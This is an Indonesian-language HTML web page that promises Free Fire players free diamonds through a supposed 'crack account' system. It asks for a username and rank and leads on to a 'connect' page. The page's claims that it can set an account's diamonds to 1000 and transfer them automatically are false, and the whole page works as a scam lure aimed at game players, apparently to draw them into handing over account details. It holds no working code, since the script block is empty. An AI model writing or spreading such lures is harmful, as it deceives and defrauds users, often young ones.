<html>
<head>
<style type="text/css">
  body {
    text-align:center;
    margin:0;
  }
  h1 {
    background:aqua;
    width:100%;
    font-size:80px;
    
  }
  p {
    font-size:30px;
 }
  input, button{
    width:50%;
    height:100px;
    font-size:50px;
    outline:none;
    background:silver;
    border:1px solid gold;
    margin:5px;
    border-radius:10px;
  }
  button {background:lime;}
  div {
    width:100%;
    height:300px;
    display:flex;
    align-items:center;
    justify-content:center;
    font-size:30px;
    background:#003e3e;
  }
img {width:100%; background:blackblue;}
</style>
</head>
<body>
<h1>INFO FREE FIRE</h1>
<p>
Para memain game FF(free fire) pasti menginginkan diamond untuk keperluan seperti senjata skin dan lain lain.
tetapi diamond ff sulit untuk didapatkan. diamond ff dapat dibeli tetapi harganya yang mahal tidak memungkinkan kita untuk membelinya.
<br><br>
Nah apakah anda ingin mendapatkan diamond ff secara gratis?.
nah anda bisa mendapatkan diamond ff gratis disini.
<br><br>
Kami telah membuat sistem yang dapat mengubah akun api menjadi crack. 
untuk akun ff kami juga membuat tiruan dengan pembuatan variable diamond menjadi 1000 diamond.
<br><br>
1000 diamond pertama di akun crack tersebut dapat dikirim ke akun ff anda secara otomatis.
tetapi sayangnya sistem tersebut telah dihentikan dikarenakan update dari developer.
<br><br>
Tapi tenang kami sudah membuat yang baru. kami ada <i><b>Rewards Redemption</b></i> yang bisa anda dapatkan
dengan cara memasukan <b>username</b> dan kami membutuhkan <b>rank</b> anda untuk membuat default system agar pembuatan akun crack dapat terhubung ke akun Anda melalui akun API</p>
<img src="imgg/logoff.png">
<input id="nama" placeholder="Masukan username">
<input id="no" placeholder="Masukan rank">
<a href="mulai.html"><button>HUBUNGKAN</button></a>
<p>Dengan ini berarti anda menyetujui persyaratan dan peraturan kami.</p>
<div>Copyright © kukuh studios web git 2021 aplified.</div>
<script type='text/javascript'>
  
</script>
</body>
</html>
